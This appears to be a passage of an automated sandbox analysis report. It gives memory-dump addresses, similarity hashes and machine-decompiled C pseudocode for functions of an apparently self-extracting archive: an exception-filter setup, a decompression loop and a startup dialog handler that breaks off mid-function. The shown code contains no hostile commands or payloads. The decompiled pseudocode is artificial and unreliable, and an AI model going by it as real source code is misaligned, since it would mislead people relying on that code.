0x00198e18
0x00198df7
0x00000000
0x00198df7
0x00198dcf
0x00198ddb
0x00198de0
0x00198de2
0x00000000
0x00000000
0x00198de4
0x00198de6
0x00000000
0x00198de6
0x00198c26
0x00198c2c
0x00198c2f
0x00198c98
0x00198c9d
0x00198cae
0x00198cb3
0x00198cb6
0x00198cb8
0x00198d05
0x00198d05
0x00198d08
0x00198d08
0x00198d0f
0x00198c64
0x00198c64
0x00198c66
0x00198d22
0x00198d22
0x00198d22
0x00198d24
0x00198d24
0x00000000
0x00198d24
0x00198c6c
0x00198c6c
0x00198c6e
0x00000000
0x00000000
0x00198c76
0x00000000
0x00198c76
0x00198d15
0x00198d17
0x00000000
0x00000000
0x00198c60
0x00198c60
0x00000000
0x00198c60
0x00198cba
0x00198cc2
0x00000000
0x00000000
0x00198cc4
0x00198cca
0x00198cd6
0x00198cd7
0x00198cda
0x00198ce8
0x00198ce9
0x00198cf0
0x00198cdc
0x00198cdc
0x00198cdc
0x00198cf5
0x00198cf5
0x00198cf8
0x00198cfa
0x00198c5d
0x00198c5d
0x00000000
0x00198c5d
0x00198d00
0x00000000
0x00198d00
0x00198c31
0x00198c34
0x00000000
0x00000000
0x00198c36
0x00198c38
0x00198c7c
0x00198c7c
0x00198c7e
0x00000000
0x00000000
0x00198c8a
0x00198c91
0x00000000
0x00198c91
0x00198c3a
0x00198c3d
0x00000000
0x00000000
0x00198c3f
0x00198c42
0x00000000
0x00000000
0x00198c51
0x00198c56
0x00198c58
0x00198c5a
0x00000000
0x00198c5a
0x00198bfc
0x00198bfe
0x00000000
0x00000000
0x00198c02
0x00198c03
0x00198c07
0x00000000
0x00000000
0x00198c0b
0x00198c0c
0x00000000
0x00198c0c
0x00198b48
0x00198b4e
0x00000000
0x00000000
0x00198b54
0x00198b5a
0x00198b60
0x00198b62
0x00198be2
0x00198be2
0x00000000
0x00198be2
0x00198b64
0x00198b6e
0x00198b6e
0x00198b7e
0x00198b81
0x00198b83
0x00198bdd
0x00198bdd
0x00198be0
0x00198be0
0x00000000
0x00198be0
0x00198b85
0x00198b8b
0x00198b8d
0x00198b8f
0x00198bb4
0x00198bba
0x00198bc6
0x00198bd1
0x00198bda
0x00000000
0x00198bda
0x00198b91
0x00198b9b
0x00198b9d
0x00198ba2
0x00198ba8
0x00000000
0x00000000
0x00198baa
0x00000000
0x00000000
0x00198bac
0x00198bb2
0x00000000
0x00000000
0x00000000
0x00198bb2
0x00198b93
0x00198b99
0x00000000
0x00000000
0x00000000
0x00198b99
0x00198b87
0x00198b89
0x00000000
0x00000000
0x00000000
0x00198b89
0x00198b66
0x00198b6c
0x00000000
0x00000000
0x00000000
0x00198b6c
0x00198ab0
0x00198ab0
0x00198ab0
0x00198ab0
0x00000000
0x00198ab0
0x00198a67
0x00198a6a
0x00198a6b
0x00198a6e
0x00198a70
0x00198a7b
0x00198a7d
0x00198a8c
0x00198a9e
0x00198a9e
0x00198a7d
0x00000000
0x00198a6e
0x00198a4c
0x00198a53
0x00198a5a
0x00198aa5
0x00000000
0x00198aa5
0x00000000
0x00198a5a
0x00198a06
0x00198a09
0x00198a10
0x00198a17
0x00198a1c
0x00198a1e
0x00000000
0x00000000
0x00198a20
0x00198a22
0x00198a25
0x00198a25
0x00198a2b
0x00198a30
0x00000000
0x00198a30
0x001989d4
0x001989dd
0x001989de
0x001989e3
0x001989e6
0x001989e8
0x001989f0
0x001989f0
0x001989f2
0x00000000
0x00000000
0x00000000
0x001989f4
0x0019897d
0x00198981
0x00198987
0x0019898a
0x0019898e
0x00198996
0x00198997
0x0019899a
0x001989a2
0x001989a3
0x001989a6
0x001989a8
0x001989ae
0x001989b4
0x001989b6
0x001989bc
0x001989c3
0x001989c6
0x001989c6
0x001989b4
0x001989a6
0x0019899a
0x0019898e
0x00000000
0x00198981
0x001988e5
0x001988e8
0x00000000
0x00000000
0x001988ee
0x001988f1
0x001988f4
0x001988f6
0x00000000
0x00000000
0x001988fc
0x001988ff
0x00000000
0x00000000
0x00198905
0x00198908
0x0019890f
0x00000000
0x00000000
0x00198917
0x00198921
0x00198926
0x00198928
0x0019895f
0x0019895f
0x00198963
0x001989ed
0x00000000
0x001989ed
0x00198969
0x0019896b
0x0019896d
0x00000000
0x0019896d
0x0019892a
0x0019892e
0x00000000
0x00000000
0x00198930
0x00198938
0x00198939
0x00198940
0x0019895a
0x00000000
0x0019895a
0x00198820
0x00198827
0x00000000
0x00000000
0x0019882f
0x0019883a
0x0019883f
0x00198842
0x00198844
0x00000000
0x00000000
0x00198846
0x0019884d
0x00000000
0x00000000
0x0019884f
0x00198856
0x00198860
0x00198861
0x00198898
0x0019889a
0x001988a6
0x001988ab
0x001988ad
0x00000000
0x001988ad
0x00198863
0x00198865
0x00198873
0x00198878
0x0019887c
0x00198882
0x00198882
0x00198793
0x00198778
0x0019877f
0x00198784
0x0019878b
0x00000000
0x0019878b
0x0019871d
0x00198723
0x00198728
0x0019872a
0x00000000
0x00000000
0x0019872c
0x00198733
0x00198745
0x00198747
0x00000000
0x00198747
0x00198736
0x0019873c
0x00198741
0x00198743
0x00000000
0x00000000
0x00000000
0x00198743
0x001986ec
0x001986ef
0x00000000
0x00000000
0x00000000
0x001986ef
0x001986de
0x001986e5
0x00000000
0x00000000
0x00000000
0x001986e5
0x001986ae
0x001986b5
0x00000000
0x00000000
0x001986b7
0x001986bb
0x001986c1
0x00000000
0x00000000
0x00000000
0x001986c1
0x0019865f
0x00198662
0x00198664
0x00000000
0x00000000
0x00000000
0x00198664
0x00198636
0x0019863c
0x0019863f
0x00198642
0x00198644
0x00000000
0x0019864a
0x0019864a
0x0019864a
0x00000000
0x0019864a
0x00198644
0x00198508
0x0019850e
0x00000000
0x00000000
0x00198510
0x00198517
0x00000000
0x00000000
0x00000000
0x00198517
0x001984e1
0x001984eb
0x001984eb
0x001984f1
0x00000000
0x001984f1
0x001984e3
0x001984e9
0x00000000
0x00000000
0x00000000
0x001984e9
0x001984c3
0x001984cd
0x001984cd
0x001984d3
0x00000000
0x001984d3
0x001984c5
0x001984cb
0x00000000
0x00000000
0x00000000
0x001984cb
0x0019842c
0x0019842f
0x0019844e
0x0019844e
0x00198451
0x00000000
0x00000000
0x00198457
0x0019845e
0x00000000
0x00000000
0x00198469
0x0019846a
0x0019846e
0x0019846f
0x00198470
0x00198475
0x00198477
0x0019848c
0x0019849d
0x00000000
0x00198479
0x00198480
0x00000000
0x00198480
0x00198477
0x00198431
0x00198438
0x00000000
0x0019843e
0x00198449
0x00000000
0x00198449
0x00198438
0x001983f5
0x00198413
0x00198413
0x00000000
0x00198413
0x001983f7
0x001983f8
0x001983fc
0x001983fd
0x00198405
0x0019841a
0x0019841a
0x00000000
0x00198407
0x0019840e
0x00000000
0x0019840e

APIs

__EH_prolog.LIBCMT ref: 001983C5
_memcmp.LIBVCRUNTIME ref: 0019883A

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: c6e6d3a3de0fb85a49b5765eca2de4ff25740e6bbc83ff5cb2c3ce119e3fa6e4
Instruction ID: f754168808f0512e50c06ec8daa3baa2d43713c7ddb6a9fa276b9f0125f816c3
Opcode Fuzzy Hash: c6e6d3a3de0fb85a49b5765eca2de4ff25740e6bbc83ff5cb2c3ce119e3fa6e4
Instruction Fuzzy Hash: 85821C71904185AEDF19DF64C895BFABBB9BF16300F0841BAEC599B143DF315A84C760

Uniqueness

Uniqueness Score: -1.00%

Function 001AE643, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AE643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E001AE64F); // executed
				return _t1;
			}

0x001ae648
0x001ae64e

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,001AE084), ref: 001AE648

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6c22d2702937f0e9cf29ace3a4289f9c16a7fa5944862d3471c01fa50f01da59
Instruction ID: bd32469d906ce92b285c8856337a816e7e1816b7646a24e101d86dd9eb3939f9
Opcode Fuzzy Hash: 6c22d2702937f0e9cf29ace3a4289f9c16a7fa5944862d3471c01fa50f01da59
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 001A626D, Relevance: .3, Instructions: 325
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001A626D(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx; // executed
				E001A2A7F(__ecx, __edx); // executed
				E001A42D8(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E001AEA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_push(0x00400000 - _t263 & 0xfffffff0);
					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
					_t161 = E0019C70F();
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E0019A4AA(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E001A33D3(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E001A045D( *((intOrPtr*)(_t216 + 0x14)), E001A6CAC, _t232);
											} else {
												E001A66A2(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E001A0697( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E001A6CDB(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E001A2E2C(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E001B0E40(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E001AEA80(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E001B0E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E001A47DA(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E001AEA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}

0x001a6277
0x001a6279
0x001a6287
0x001a628f
0x001a6293
0x001a6295
0x001a6297
0x001a6297
0x001a629a
0x001a62a0
0x001a62a1
0x001a62a6
0x001a62b0
0x001a6297
0x001a62bf
0x001a62cf
0x001a62d8
0x001a62df
0x001a62e2
0x001a62e4
0x001a62e8
0x001a62ea
0x001a62ee
0x001a62f2
0x001a62f6
0x001a62f6
0x001a6302
0x001a6308
0x001a6309
0x001a630e
0x001a6314
0x00000000
0x00000000
0x001a631a
0x001a631c
0x001a6320
0x001a6328
0x00000000
0x001a632e
0x001a6334
0x00000000
0x001a658a
0x001a633e
0x001a6340
0x001a6344
0x001a6348
0x001a6348
0x001a634a
0x001a6350
0x001a6354
0x001a6354
0x001a6356
0x001a6359
0x001a635b
0x001a635f
0x001a6366
0x001a6368
0x001a637b
0x001a6380
0x001a6388
0x001a638b
0x001a638b
0x001a638f
0x001a6392
0x001a6398
0x001a639e
0x001a63a4
0x001a63a7
0x001a63aa
0x00000000
0x001a63aa
0x001a636a
0x001a636a
0x001a63ae
0x001a63ae
0x001a63b3
0x001a63bd
0x001a63c3
0x001a63c7
0x001a63cd
0x001a6400
0x001a6400
0x001a6405
0x001a6416
0x001a6416
0x001a641d
0x001a6407
0x001a6407
0x001a640e
0x00000000
0x001a6410
0x001a6410
0x001a6410
0x001a640e
0x001a6425
0x001a6432
0x001a6434
0x001a6437
0x001a643b
0x001a643b
0x001a643d
0x001a6441
0x001a6449
0x001a6449
0x001a644e
0x00000000
0x00000000
0x001a6443
0x001a6443
0x001a6447
0x00000000
0x00000000
0x001a6447
0x001a63cf
0x001a63d2
0x001a63d6
0x001a63dc
0x001a63dd
0x001a63e2
0x001a63e4
0x001a645f
0x001a645f
0x001a63e6
0x001a63e6
0x001a63ea
0x001a63f5
0x001a63f5
0x001a63f9
0x00000000
0x001a63ec
0x001a63ec
0x001a63f3
0x00000000
0x00000000
0x00000000
0x00000000
0x001a63f3
0x001a63ea
0x001a63e4
0x001a63cd
0x00000000
0x001a6450
0x001a6453
0x001a6455
0x001a6455
0x001a645d
0x001a6464
0x001a6464
0x001a646a
0x001a646f
0x001a6471
0x001a6473
0x001a6475
0x001a6475
0x001a6475
0x001a6476
0x001a6478
0x001a647a
0x001a647c
0x001a647e
0x001a6482
0x001a6482
0x001a6488
0x001a648c
0x001a6490
0x001a6494
0x001a6496
0x001a6499
0x001a649b
0x001a649e
0x001a64a0
0x001a64a2
0x001a64a4
0x001a64a4
0x001a64a6
0x001a64ab
0x001a64ae
0x001a64c3
0x001a64b0
0x001a64b3
0x001a64b3
0x001a64cc
0x001a64ce
0x001a64d2
0x001a64d6
0x001a64d6
0x001a64dc
0x001a64dc
0x001a64e0
0x001a64e4
0x001a64e6
0x001a6641
0x00000000
0x001a64ec
0x001a64ef
0x001a64f6
0x001a64fa
0x001a64fc
0x001a6568
0x001a6568
0x00000000
0x001a64fe
0x001a64fe
0x001a64fe
0x001a6500
0x001a6503
0x001a6505
0x001a650c
0x001a6527
0x001a652a
0x001a652f
0x001a6531
0x00000000
0x00000000
0x001a650e
0x001a6511
0x001a6516
0x001a6518
0x001a651e
0x001a6525
0x001a6537
0x001a6537
0x001a653e
0x001a6544
0x001a654b
0x001a65a2
0x001a65a7
0x001a65aa
0x001a65ac
0x001a65b2
0x001a65b9
0x001a65bd
0x001a65c5
0x001a65cb
0x001a65ce
0x001a65d2
0x001a65d9
0x001a65dd
0x001a65e4
0x001a65e6
0x001a65e8
0x001a65fe
0x001a6606
0x001a660f
0x001a6613
0x001a6619
0x00000000
0x001a6619
0x00000000
0x001a65e6
0x001a654d
0x001a654d
0x001a6551
0x001a6597
0x001a6599
0x001a656c
0x001a656c
0x001a656e
0x001a6574
0x001a6578
0x001a657a
0x001a6580
0x001a662b
0x001a662d
0x001a662f
0x001a6623
0x001a6623
0x001a6625
0x001a6645
0x001a6645
0x001a664a
0x00000000
0x00000000
0x001a6631
0x001a663a
0x001a6620
0x001a6620
0x00000000
0x001a6620
0x001a662f
0x001a6586
0x001a6586
0x00000000
0x001a6586
0x001a6580
0x00000000
0x00000000
0x00000000
0x001a6551
0x001a654b
0x00000000
0x00000000
0x00000000
0x001a6525
0x001a6518
0x00000000
0x001a6553
0x001a6557
0x001a655d
0x001a655e
0x001a6562
0x001a6562
0x00000000
0x001a6500
0x001a64fc
0x00000000
0x001a64e6
0x001a6592
0x00000000
0x001a6334
0x001a6328
0x00000000
0x001a6320
0x001a6650
0x001a6658
0x001a665b
0x001a6660
0x001a666e
0x001a6673
0x001a6681
0x001a669f

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 97ee14bc718f819e17110ec6b98e0b6da9f439fd5a0366c17f1c1c9f3106f925
Instruction ID: bf629c9cefffd28ce3b8256893aa2bcead556efcb924989f9cb08c9a8e2ec7e2
Opcode Fuzzy Hash: 97ee14bc718f819e17110ec6b98e0b6da9f439fd5a0366c17f1c1c9f3106f925
Instruction Fuzzy Hash: 0ED107B5A043418FDB14CF28C88579BBBE0BF9A308F0C456DE8489B642D734E958CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001AA5D1, Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E001AA5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				int _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				WCHAR* _t288;
				intOrPtr _t290;
				void* _t299;
				void* _t300;
				struct HWND__* _t302;
				signed int _t305;
				void* _t306;
				struct HWND__* _t308;
				void* _t310;
				long _t312;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t299 = __edx;
				_t285 = __ecx;
				E001AD870(E001C14F6, _t321);
				E001AD940();
				_t275 =  *(_t321 + 0x10);
				_t305 =  *(_t321 + 0xc);
				_t302 =  *(_t321 + 8);
				if(E001912D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t306 = _t305 - 0x110;
					__eflags = _t306;
					if(__eflags == 0) {
						E001AC343(_t299, __eflags, __fp0, _t302);
						_t105 =  *0x1db704;
						_t277 = 1;
						 *0x1d75d8 = _t302;
						 *0x1d75c8 = _t302;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t302, 0x80, 1, _t105); // executed
						}
						_t106 =  *0x1e5d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t302, 0x68);
						 *(_t321 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E001A95F8(_t321 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t302, 0x66);
						__eflags =  *0x1d9602;
						_t308 = _t111;
						 *(_t321 + 0x10) = _t308;
